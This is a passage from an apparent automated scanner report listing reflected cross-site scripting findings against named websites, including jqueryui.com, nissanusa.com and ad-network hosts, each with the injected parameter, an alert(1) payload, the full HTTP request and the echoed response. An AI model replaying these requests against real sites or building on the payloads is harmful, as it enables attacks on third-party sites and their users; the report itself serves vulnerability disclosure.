iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxc570e"><script>alert(1)</script>afcffadfccf&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:07:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6de88"><script>alert(1)</script>154c7b1f564 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px6de88"><script>alert(1)</script>154c7b1f564&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:07:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 112ed"><script>alert(1)</script>7d0c4e6853f was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30112ed"><script>alert(1)</script>7d0c4e6853f&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:06:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b44f"><script>alert(1)</script>4183a5e6bd3 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=305b44f"><script>alert(1)</script>4183a5e6bd3&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:07:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3000"><script>alert(1)</script>0be6e99973d was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb3000"><script>alert(1)</script>0be6e99973d&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:07:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf40'-alert(1)-'81a8eb9bf10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Sat, 29 Jan 2011 01:44:29 GMT Connection: close Content-Length: 8181
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-18380300_1296265469","http://ib.adnxs.com/ptj?member=311&inv_code=cm.quadbostonherald4bf40'-alert(1)-'81a8eb9bf10&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald4bf40%27-alert%281%29-%2781a8eb9bf10%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-18380 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a0a3'-alert(1)-'5a9d9390595 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.quadbostonherald/;sz=9a0a3'-alert(1)-'5a9d9390595 HTTP/1.1 Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 8085 Date: Sat, 29 Jan 2011 04:51:56 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-40496331_1296276716","http://ib.adnxs.com/ptj?member=311&inv_code=cm.quadbostonherald&size=9a0a3'-alert(1)-'5a9d9390595&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-40496331_1296276716%2C11d765b6a10b1b3%2Cnone%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 829d0'-alert(1)-'5bab6147ab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 186e2'-alert(1)-'9de2a10529b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.rev_bostonherald/;sz=186e2'-alert(1)-'9de2a10529b HTTP/1.1 Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 8085 Date: Sat, 29 Jan 2011 04:51:50 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-66675716_1296276710","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald&size=186e2'-alert(1)-'9de2a10529b&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-66675716_1296276710%2C11d765b6a10b1b3%2Cnone%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm ...[SNIP]...
The value of the vehicle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4e1"><script>alert(1)</script>e67eb90c86a was submitted in the vehicle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback1e4e1"><script>alert(1)</script>e67eb90c86a&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.3.2 Content-Type: text/html; charset=UTF-8 Expires: Fri, 28 Jan 2011 16:59:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 28 Jan 2011 16:59:39 GMT Content-Length: 16017 Connection: close Set-Cookie: PHPSESSID=t7cgpte7k894phrrjtaofv1dj7; path=/
The value of the vary request parameter is copied into the HTML document as plain text between tags. The payload 1e90e<img%20src%3da%20onerror%3dalert(1)>871ea2c5bb2 was submitted in the vary parameter. This input was echoed as 1e90e<img src=a onerror=alert(1)>871ea2c5bb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&vary=1e90e<img%20src%3da%20onerror%3dalert(1)>871ea2c5bb2&getLoader=true HTTP/1.1 Host: main.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:45:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-From-Cache: False Cache-Control: public Last-Modified: Wed, 17 Nov 2010 19:11:59 GMT ETag: MjAxMC0xMS0xNyAxOToxMTo1OQ== Vary: * Content-Type: application/x-javascript Content-Length: 12228
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad590"><script>alert(1)</script>9326a51b31a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMad590"><script>alert(1)</script>9326a51b31a/DLX/1@x96 HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:59:53 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e5b4"><script>alert(1)</script>109944f53ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX9e5b4"><script>alert(1)</script>109944f53ee/1@x96 HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 17:00:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6adea"><script>alert(1)</script>15e3466ad2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX/1@x966adea"><script>alert(1)</script>15e3466ad2a HTTP/1.1 Host: mig.nexac.com Proxy-Connection: keep-alive Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 17:00:12 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 319 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/
4.651. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mx.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'-alert(1)-'7c77be0c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9bb54'-alert(1)-'7c77be0c2b9=1 HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=mx.imlive.com&ul=/?9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&qs=9bb54'-alert(1)-'7c77be0c2b9=1&iy=dallas&id=44&iu=1&vd=a7e3d806-3337-4a1b-9339-464061ff6408';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
4.652. http://mx.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://mx.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d8"><a>9322a6cdc6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?601d8"><a>9322a6cdc6e=1 HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfb3"><script>alert(1)</script>3d6205c4976 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 398 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:42 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821d4"><script>alert(1)</script>35018ed4335 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:51 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8767b"><script>alert(1)</script>739eb1cf5ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:47:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 389 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:00 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64be6"-alert(1)-"dc3b028ab21 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:46:39 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PiwK1O10IxS|R10M5V|R10M5b|R10M5d|R10M5l|R10M5x|R10M62|R10M69|O1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 601 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:41 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "10115500001000051100164be6"-alert(1)-"dc3b028ab21"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b702d"><script>alert(1)</script>58724ec2a5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:49:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 398 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:08 GMT;path=/
